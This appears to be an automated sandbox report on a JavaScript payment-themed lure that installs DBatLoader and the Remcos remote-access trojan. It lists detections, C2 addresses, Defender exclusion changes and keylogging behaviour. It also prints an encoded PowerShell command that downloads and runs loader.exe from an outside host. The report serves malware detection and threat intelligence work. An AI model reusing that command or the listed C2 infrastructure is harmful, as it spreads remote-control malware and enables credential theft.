Windows Analysis Report
Payment reference no. - FT910298955674.js

Overview

General Information

Sample name: Payment reference no. - FT910298955674.js
Analysis ID: 1649114
MD5: 1ed1e9dce1cb79bc90938280c24114d2
SHA1: ea3c8f8617f060f095d75c2f67ae054def1bfa94
SHA256: ecd14c3cf75fd350c3dbb849d5fea36c8f00d66665a67d1f0ed1d41c8f7a7648
Tags: js, user-abuse_ch

Detection

DBatLoader, Remcos
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
Adds extensions / path to Windows Defender exclusion list (Registry)
Allocates many large memory chunks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates a thread in another existing process (thread injection)
Drops PE files with a suspicious file extension
Encrypted powershell cmdline option found
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Creation with Colorcpl
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch or control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Windows Defender Exclusions Added - Registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Name: DBatLoader
Description: This Delphi loader misuses Cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection

Source: 00000014.00000002.2203224741.0000000002C30000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": ["103.186.117.225:9916:0", "bb990a9a6fafe.duckdns.org:6666:0", "103.186.117.225:6666:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "makwin-04NDKU", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "mkwain", "Keylog file max size": ""}
Source: Payment reference no. - FT910298955674.js Virustotal: Detection: 22%
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2203224741.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7724, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\mkwain\logs.dat, type: DROPPED
Source: Submitted Sample Neural Call Log Analysis: 100.0%
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00433B64 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 20_2_00433B64
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA4975 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 20_2_06CA4975
Source: colorcpl.exe Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match File source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7724, type: MEMORYSTR

Privilege Escalation

Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00406ABC _wcslen,CoGetObject, 20_2_00406ABC
Source: Binary string: easinvoker.pdb source: loader.exe, 0000000E.00000002.1106214675.0000000020D18000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1029107436.000000007F980000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1033797948.000000007ECA3000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1033797948.000000007EC90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: loader.exe, 0000000E.00000003.1037350319.000000000074C000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 0000000E.00000002.1106214675.0000000020D18000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1029107436.000000007F980000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1033797948.000000007ECA3000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1037350319.000000000077B000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1033797948.000000007EC90000.00000004.00001000.00020000.00000000.sdmp

Change of critical system settings

Source: C:\Windows\System32\reg.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths C:\
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FF54D0 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 14_2_02FF54D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 20_2_004090DC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 20_2_0040B6B5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 20_2_0041C7E5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 20_2_0040B8BA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0044E989 FindFirstFileExA, 20_2_0044E989
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 20_2_00408CDE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW, 20_2_00419CEE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 20_2_00407EDD
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00406F13 FindFirstFileW,FindNextFileW, 20_2_00406F13
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C7C6CB FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 20_2_06C7C6CB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C7C4C6 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 20_2_06C7C4C6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C78CEE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 20_2_06C78CEE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C8AAFF FindFirstFileW, 20_2_06C8AAFF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CBF79A FindFirstFileExA, 20_2_06CBF79A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C8D5F6 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 20_2_06C8D5F6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C79EED __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 20_2_06C79EED
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C77D24 FindFirstFileW,FindNextFileW, 20_2_06C77D24
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C79AEF __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 20_2_06C79AEF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 20_2_00407357

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Malware configuration extractor URLs: bb990a9a6fafe.duckdns.org
Source: Malware configuration extractor IPs: 103.186.117.225
Source: unknown DNS query: name: bb990a9a6fafe.duckdns.org
Source: global traffic TCP traffic: 192.168.2.7:49687 -> 103.186.117.225:9916
Source: Joe Sandbox View IP Address: 185.208.156.66
Source: Joe Sandbox View ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49681 -> 185.208.156.66:80
Source: Network traffic Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.208.156.66:80 -> 192.168.2.7:49681
Source: global traffic HTTP traffic detected:
GET /file/loader.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: www.nawatbsc.com
Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 103.186.117.225
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004062E2 ShellExecuteW,URLDownloadToFileW, 20_2_004062E2
Source: global traffic DNS traffic detected: DNS query: www.nawatbsc.com
Source: global traffic DNS traffic detected: DNS query: bb990a9a6fafe.duckdns.org
Source: powershell.exe, 00000009.00000002.1262106263.000002C4F9D0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mC5Pys
Source: powershell.exe, 0000000B.00000002.1089379408.000001CC579D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mi8
Source: powershell.exe, 00000007.00000002.954970149.00000193B0E39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: svchost.exe, 00000016.00000002.2207105706.0000024031200000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: qmgr.db.22.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.22.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.22.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.22.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.22.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.22.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.22.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: colorcpl.exe String found in binary or memory: http://geoplugin.net/json.gp
Source: colorcpl.exe, 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 00000009.00000002.1250972115.000002C4F1D43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1250972115.000002C4F1E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1050453582.000001CC4F654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.980997999.000001CC3F808000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.980997999.000001CC3F808000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000005.00000002.1163170909.000001E41A79F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.952695151.0000019398D4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1013066820.000002C4E1CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.980997999.000001CC3F5E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.980997999.000001CC3F808000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.980997999.000001CC3F808000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000B.00000002.1088984280.000001CC57800000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000009.00000002.1013066820.000002C4E32B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1013066820.000002C4E2902000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.nawatbsc.com
Source: powershell.exe, 00000009.00000002.1013066820.000002C4E1F02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1013066820.000002C4E2902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1013066820.000002C4E1CD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.nawatbsc.com/file/loader.exe
Source: loader.exe, 0000000E.00000002.1106214675.0000000020D94000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1033797948.000000007ECA3000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000002.1132324849.000000007EDDF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.pmail.com
Source: powershell.exe, 00000005.00000002.1163170909.000001E41A774000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1163170909.000001E41A75F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.952695151.0000019398D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.952695151.0000019398D0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1013066820.000002C4E1CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.980997999.000001CC3F5E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.1050453582.000001CC4F654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.1050453582.000001CC4F654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.1050453582.000001CC4F654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: edb.log.22.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000016.00000003.1217672425.0000024031090000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.22.dr, edb.log.22.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 0000000B.00000002.980997999.000001CC3F808000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.1013066820.000002C4E2902000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.1265831190.000002C4F9F10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.c
Source: powershell.exe, 00000009.00000002.1250972115.000002C4F1D43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1250972115.000002C4F1E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1050453582.000001CC4F654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.22.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00409D1E SetWindowsHookExA 0000000D,00409D0A,00000000 20_2_00409D1E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard, 20_2_0040B158
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0041696E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 20_2_0041696E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C8777F OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 20_2_06C8777F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard, 20_2_0040B158
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00409E4A GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, 20_2_00409E4A
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loader.exe PID: 7480, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7724, type: MEMORYSTR

E-Banking Fraud

Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBuAGEAdwBhAHQAYgBzAGMALgBjAG8AbQAvAGYAaQBsAGUALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgAkAG8AdQB0AHAAdQB0ACAAPQAgACIAJABlAG4AdgA6AFQAZQBtAHAALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAbwB1AHQAcAB1AHQACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAG8AdQB0AHAAdQB0AA==
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2203224741.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7724, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\mkwain\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0041CF2D SystemParametersInfoW, 20_2_0041CF2D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C8DD3E SystemParametersInfoW, 20_2_06C8DD3E

System Summary

Source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
